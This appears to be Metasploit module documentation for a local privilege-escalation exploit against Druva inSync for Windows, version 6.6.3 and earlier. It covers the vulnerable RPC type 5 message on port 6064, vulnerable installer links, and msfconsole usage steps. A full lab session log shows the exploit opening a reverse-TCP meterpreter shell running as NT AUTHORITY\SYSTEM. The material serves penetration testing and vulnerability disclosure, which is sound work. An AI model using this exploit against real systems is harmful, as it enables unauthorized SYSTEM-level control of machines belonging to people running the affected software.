## Vulnerable Application

Druva inSync client for Windows exposes a network service on TCP
port 6064 on the local network interface. inSync versions 6.6.3
and prior do not properly validate user-supplied program paths
in RPC type 5 messages, allowing execution of arbitrary commands
as SYSTEM.

This module has been tested successfully on inSync versions
6.5.2r99097 and 6.6.3r102156 on Windows 7 SP1 (x64).

Download:

* https://downloads.druva.com/downloads/inSync/Windows/6.5.2/inSync6.5.2r99097.msi
* https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc`
  4. `set SESSION <SESSION>`
  5. `check`
  6. `run`
  7. You should get a new *SYSTEM* session


## Options

  ### WritableDir

  A writable directory file system path. (default: `%TEMP%`)


## Scenarios

### Druva inSync6.6.3r102156 on Windows 7 SP1 (x64)

```
msf6 > use exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > set session 1
session => 1
msf6 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf6 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. Service 'inSyncCPHService' exists.
[*] Connecting to 127.0.0.1:6064 ...
[*] Sending packet (258 bytes) to 127.0.0.1:6064 ...
[*] Sending stage (175174 bytes) to 172.16.191.171
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.171:49520) at 2020-12-10 07:03:04 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : TEST
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
```

